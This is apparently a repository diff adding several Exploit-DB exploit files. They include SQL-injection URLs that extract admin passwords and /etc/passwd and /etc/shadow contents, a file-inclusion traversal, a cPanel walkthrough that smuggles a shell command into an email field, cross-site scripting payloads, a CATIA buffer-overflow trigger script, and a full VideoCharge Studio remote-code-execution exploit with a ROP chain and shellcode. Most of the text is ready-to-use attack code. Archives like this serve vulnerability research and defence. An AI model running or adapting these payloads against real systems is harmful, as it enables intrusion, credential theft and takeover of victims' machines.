platforms/php/webapps/31805.txt Executable file
View file

@ -0,0 +1,7 @@
source: http://www.securityfocus.com/bid/29261/info
The 'KuiraniKerim' module for PHP-Nuke is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
http://www.example.com/modules.php?name=KuraniKerim&op=TurkceNuke_Com_Islami_Moduller_Destek_Sitesi&sid=-1%2F%2A%2A%2Funion%2F%2A%2A%2Fselect%2F%2A%2A%2F0%2Cpwd,aid,2,3%2F%2A%2A%2Ffrom%2F%2A%2A%2Fnuke_authors%2F%2A%2A%2Fwhere%2F%2A%2A%2Fradminsuper%3D1%2F%2A

9
platforms/php/webapps/31806.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29275/info
The 'bcoos' program is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.
An attacker can exploit this vulnerability using directory-traversal strings to include local scripts in the context of the application. This may allow the attacker to access sensitive information that may aid in further attacks.
This issue affects bcoos 1.0.13; other versions may also be affected.
http://www.example.com/bcoos/class/debug/highlight.php?file=../../../../../boot.ini

30
platforms/php/webapps/31807.txt Executable file
View file

@ -0,0 +1,30 @@
source: http://www.securityfocus.com/bid/29277/info
cPanel is prone to a remote privilege-escalation vulnerability because of an unspecified error.
Successfully exploiting this issue allows remote attackers to gain administrative privileges to the affected application and execute malicious PHP code in the context of the webserver process. This may facilitate a compromise of the webserver and the underlying system; other attacks are also possible.
Test it:
++++++++++++++++++++++++++
Step 1
Save this file in /home/user/public_html/do.pl .
#!/usr/bin/perl
$old='/home/user/public_html/test.txt';
$new='/home/root/kon.txt';
rename $old, $new;
++++++++++++++++++++++++++
step 2
make a text file named test.txt in your public_html directory.
path will be : /home/user/public_html/test.txt .
++++++++++++++++++++++++++
step 3
create an account and write ali@hackerz.ir;./home/user/public_html/do.pl in E-mail Address text box
then click on the "create" button.
Yes , you can find your file in /home/root/ .
++++++++++++++++++++++++++
()()()()()()()()()()()()()
you can run your own code !(mass defacer, exploit's or everything that u want).
Enjoy it...

9
platforms/php/webapps/31808.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29291/info
AppServ Open Project is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
AppServ Open Project 2.5.10 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?appservlang=">[XSS] http://www.example.com/index.php?appservlang="><IMG%20SRC=java script:alert(/XSS/)> http://www.example.com/index.php?appservlang="><BODY%20ONLOAD=alert(/ xss/)> http://www.example.com/index.php?appservlang="><script>window.open(/phpinfo.php/)</script> http://www.example.com/index.php?appservlang="><INPUT%20TYPE="xss"> http://www.example.com/index.php?appservlang="><iframe%20src=http://www.example2.com> http://www.example.com/index.php?appservlang="><BR><input%20type%20=%20"password"%20name="pass"/><button%20onClick="java script:alert(/I%20have%20your%20password:%20/%20+%20pass.value);">Submit</button><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR><BR>

9
platforms/php/webapps/31809.txt Executable file
View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/29295/info
Starsgames Control Panel is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
Starsgames Control Panel 4.6.2 is vulnerable; other versions may also be affected.
http://www.example.com/index.php?showtopic=18&st=&lt;/textarea&gt;<script>alert(/xss/)</script> http://www.example.com/index.php?showtopic=18&st=&lt;/textarea&gt;<iframe src=http://www.google.com>

15
platforms/php/webapps/31810.txt Executable file
View file

@ -0,0 +1,15 @@
source: http://www.securityfocus.com/bid/29296/info
Web Slider is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Web Slider 0.6 is vulnerable; other versions may also be affected.
http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,concat(CHAR(0x75,0x73,0x65,0x72,0x3A,0xD,0xA),username,0x3a,password),2,concat(database(),char(58),0x2020,version()),4+from+users/*
http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,concat(user(),0x3a,password),null,concat(database(),0x2020,version()),4+from+mysql.user/*
http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,load_file(0x6574632F706173737764),2,0,4+from+users/*
http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,load_file(CONCAT(CHAR(0x65),CHAR(0x74),CHAR(0x63),CHAR(0x2F),CHAR(0x70),CHAR(0x61),CHAR(0x73),CHAR(0x73),CHAR(0x77),CHAR(0x64))),2,0,4+from+users/*
http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,substring(load_file(0x6574632F706173737764),50),2,0,4+from+users/*
http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,substring(load_file(etc/passwd),50),2,0,4+from+users/*
http://www.example.com/html/index.php?action=slides&group=Introduccion&slide='+union+select+0,substring(load_file(etc/shadow),50),2,0,4+from+users/*

101
platforms/windows/dos/31791.py Executable file
View file

@ -0,0 +1,101 @@
'''
# Title: Dassault Syst?mes Catia V5-6R2013 "CATV5_Backbone_Bus" Stack Buffer Overflow
# Date: 2-18-2014
# Author: Mohamed Shetta
Email: mshetta |at| live |dot| com
# Vendor Homepage: http://www.3ds.com/products-services/catia/portfolio/catia-v5/latest-release/
# Tested on: Windows 7 & Windows XP
#Vulnerability type: Remote Code Execution
#Vulnerable file: CATSysDemon.exe
#PORT: 55558 Or 55555
---------------------------------------------------------------------------------------------------------
Software Description:
CATIA developed by Dassault Syst?mes (3DS) is the world leading integrated suite of Computer Aided Design (CAD), Engineering (CAE) and Manufacturing (CAM) applications for digital product definition and lifecycle management. CATIA is widely used in aerospace, automotive, shipbuilding, energy and many other industries. CATIA Composites Design is a workbench in CATIA supporting composites design, engineering and manufacture of complex 3D composites parts containing up to thousands of plies each. Specific developments by Dassault Syst?mes allow the transfer of the composites model and determination of anisotropic material properties from the constantly-chaging fiber orientations and ply thicknesses within realistic 3D industrial components. These varying material properties in the component have to be used by numerical codes such as ACEL-NDT and the FE solver based on XLIFE++ for accurate analyses of these parts (note that trivial composites components like flat panels can be analysed by the numerical codes independently).
---------------------------------------------------------------------------------------------------------
Vulnerability Details:
A stack buffer overflow occurs when copying a user supplied input to a fixed size stack buffer.
The copying procedure stops when a null byte is found and no size check is proceeded.
The same copying pattern is used for more than one time in the vulnerable procedure but only the below one can be exploited.
---------------------------------------------------------------------------------------------------------
Vulnerable Code:
EAX contains the User Supplied data.
00406330 |> /8A08 /MOV CL,BYTE PTR DS:[EAX]
00406332 |. |880C02 |MOV BYTE PTR DS:[EDX+EAX],CL
00406335 |. |40 |INC EAX
00406336 |. |84C9 |TEST CL,CL
00406338 |.^\75 F6 \JNZ SHORT 00406330 ; CATSysDe.00406330
----------------------------------------------------------------------------------------------------------
Registers Dumb:
EAX 00000000
ECX FFB26363
EDX FFB28E70
EBX 00A5A7AA ASCII "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
ESP 00A5A630 ASCII "cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
EBP 72106AE1 MSVCR90.strncmp
ESI 00A5A674 ASCII "cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
EDI 00A5A678 ASCII "cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc
EIP 90909090
C 0 ES 002B 32bit 0(FFFFFFFF)
P 0 CS 0023 32bit 0(FFFFFFFF)
A 1 SS 002B 32bit 0(FFFFFFFF)
Z 0 DS 002B 32bit 0(FFFFFFFF)
S 0 FS 0053 32bit FFFAF000(FFF)
T 0 GS 002B 32bit 0(FFFFFFFF)
D 0
O 0
EFL 00000212 (NO,NB,NE,A,NS,PO,GE,G)
ST0 empty 0.0
ST1 empty 0.0
ST2 empty 0.0
ST3 empty 0.0
ST4 empty 0.0
ST5 empty 0.0
ST6 empty 0.0
ST7 empty 0.0
3 2 1 0 E S P U O Z D I
FST 0000 Cond 0 0 0 0 Err 0 0 0 0 0 0 0 0 (GT)
FCW 027F Prec NEAR,53 Mask 1 1 1 1 1 1
-------------------------------------------------------------------------------------------------------------
Triggering Packet Details:
(Packet) Details
(XXXX)Size of Next Data | (XXXX)Base for pointers, Set to zero for easy of exploitation. | (A*20)Junk | ("AppToBusInitMsg"+"\x00") Required String | (A*48)Junk | ("CATV5_Backbone_Bus"+"\x00")Required String | (B*49)Junk | (00000000)For Valid Message Sequence(0x00403C13) | (c*408)Junk | (XXXXXXXX)RetAdd | (c*357)small case to prevent converting shell code to small case | (Shell) Shell Code
-----------------------------------------------------------------------------------------------------------
Restrictions:
Only the most significant byte in the Return Address can be zero.
------------------------------------------------------------------------------------------------------------
Disclosure timeline:
12/15/2013 - Vendor notified and no response.
2/18/2014 - Public disclosure
'''
#!/usr/bin/env python
import socket
import struct
import ctypes
RetAdd="\x90\x90\x90\x90"
Shell="A" *1000
buff= "\x00\x00\x00\x00" + "A" * 20 + "AppToBusInitMsg" +"\x00" + "A" * 48 + "CATV5_Backbone_Bus" +"\x00" + "B"* 49 + "\x00\x00\x00\x00" +"c"* 408 + RetAdd + "c"* 357 + Shell
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("192.168.0.4", 55555))
s.send(struct.pack('>I',len(buff) ))
s.send(buff)

118
platforms/windows/remote/31788.py Executable file
View file

@ -0,0 +1,118 @@
#!/usr/bin/python
# Exploit Title: VideoCharge Studio v2.12.3.685 GetHttpResponse() MITM Remote Code Execution Exploit (SafeSEH/ASLR/DEP Bypass)
# Version: v2.12.3.685
# Date: 2014-02-19
# Author: Julien Ahrens (@MrTuxracer)
# Homepage: http://www.rcesecurity.com
# Software Link: http://www.videocharge.com
# Tested on: Win7-GER (DEP enabled)
#
# Howto / Notes:
# Since it's a MITM RCE you need to spoof the DNS Record for www.videocharge.com in order to successfully exploit this vulnerability
#
from socket import *
from struct import pack
from time import sleep
host = "192.168.0.1"
port = 80
s = socket(AF_INET, SOCK_STREAM)
s.bind((host, port))
s.listen(1)
print "\n[+] Listening on %d ..." % port
cl, addr = s.accept()
print "[+] Connection accepted from %s" % addr[0]
# Thanks Giuseppe D'Amore for the amazing shellcode
# http://www.exploit-db.com/exploits/28996/
shellcode = ("\x31\xd2\xb2\x30\x64\x8b\x12\x8b\x52\x0c\x8b\x52\x1c\x8b\x42"+
"\x08\x8b\x72\x20\x8b\x12\x80\x7e\x0c\x33\x75\xf2\x89\xc7\x03"+
"\x78\x3c\x8b\x57\x78\x01\xc2\x8b\x7a\x20\x01\xc7\x31\xed\x8b"+
"\x34\xaf\x01\xc6\x45\x81\x3e\x46\x61\x74\x61\x75\xf2\x81\x7e"+
"\x08\x45\x78\x69\x74\x75\xe9\x8b\x7a\x24\x01\xc7\x66\x8b\x2c"+
"\x6f\x8b\x7a\x1c\x01\xc7\x8b\x7c\xaf\xfc\x01\xc7\x68\x79\x74"+
"\x65\x01\x68\x6b\x65\x6e\x42\x68\x20\x42\x72\x6f\x89\xe1\xfe"+
"\x49\x0b\x31\xc0\x51\x50\xff\xd7")
junk0 = "\x90" * 1277
junk1 = "\x90" * 1900
nops="\x90" * 30
jmpesp=pack('<L',0x102340e8) * 5 # jmp esp | {PAGE_EXECUTE_READ} [cc.dll]
# jump to controlled memory
eip=pack('<L',0x61b84af1) # {pivot 4124 / 0x101c} # ADD ESP,101C # RETN [zlib1.dll]
#
# ROP registers structure:
# EBP - VirtualProtect() call
# ESP - lpAddress
# EBX - dwSize
# EDX - flNewProtect
# ECX - lpflOldProtect
#
# Craft VirtualProtect() call (0x0080D816) via [DE2D66F9 XOR DEADBEEF] and MOV to EBP
rop = pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
rop += pack('<L',0xDE2D66F9) # XOR param 1
rop += pack('<L',0x10206ac5) # POP EBX # RETN [cc.dll]
rop += pack('<L',0xDEADBEEF) # XOR param 2
rop += pack('<L',0x1002fb27) # XOR EDI,EBX # ADD DL,BYTE PTR DS:[EAX] # RETN [cc.dll]
rop += pack('<L',0x101f7572) # MOV EAX,EDI # POP EDI # RETN [cc.dll]
rop += pack('<L',0xDEADBEEF) # Filler
rop += pack('<L',0x101fbc62) # XCHG EAX,EBP # RETN [cc.dll]
# Craft VirtualProtect() dwSize in EAX and MOV to EBX
rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
rop += pack('<L',0x101f2adc) # ADD EAX,500 # RETN [cc.dll]
rop += pack('<L',0x1023ccfb) # XCHG EAX,EBX # RETN [cc.dll]
# Craft VirtualProtect() flNewProtect in EAX and MOV to EDX
rop += pack('<L',0x101e66a0) # XOR EAX,EAX # RETN [cc.dll]
rop += pack('<L',0x102026a1) # ADD EAX,25 # RETN [cc.dll]
rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
rop += pack('<L',0x102155aa) # ADD EAX,0C # RETN [cc.dll]
rop += pack('<L',0x102026b1) # ADD EAX,3 # RETN [cc.dll]
rop += pack('<L',0x101ff01d) # XCHG EAX,ECX # RETN [cc.dll]
rop += pack('<L',0x61b90402) # MOV EDX,ECX # RETN [zlib1.dll]
# Put writable offset for VirtualProtect() lpflOldProtect to ECX
rop += pack('<L',0x1020aacf) # POP ECX # RETN [cc.dll]
rop += pack('<L',0x61B96180) # writable location [zlib1.dll]
# POP a value from the stack after PUSHAD and POP value to ESI
# as a preparation for the VirtualProtect() call
rop += pack('<L',0x61b850a4) # POP ESI # RETN [zlib1.dll]
rop += pack('<L',0x61B96180) # writable location from [zlib1.dll]
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
rop += pack('<L',0x61b849b6) # POP EDI # RETN [zlib1.dll]
# Achievement unlocked: PUSHAD
rop += pack('<L',0x101e93d6) # PUSHAD # RETN [cc.dll]
rop += pack('<L',0x102340c5) # jmp esp | {PAGE_EXECUTE_READ} [cc.dll]
payload = junk0 + eip + junk1 + rop + jmpesp + nops + shellcode
buffer = "HTTP/1.1 200 OK\r\n"
buffer += "Date: Sat, 09 Feb 2014 13:33:37 GMT\r\n"
buffer += "Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny16 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g\r\n"
buffer += "X-Powered-By: PHP/5.2.6-1+lenny16\r\n"
buffer += "Vary: Accept-Encoding\r\n"
buffer += "Content-Length: 4000\r\n"
buffer += "Connection: close\r\n"
buffer += "Content-Type: text/html\r\n\r\n"
buffer += payload
buffer += "\r\n"
print cl.recv(1000)
cl.send(buffer)
print "[+] Sending exploit: OK\n"
sleep(3)
cl.close()
s.close()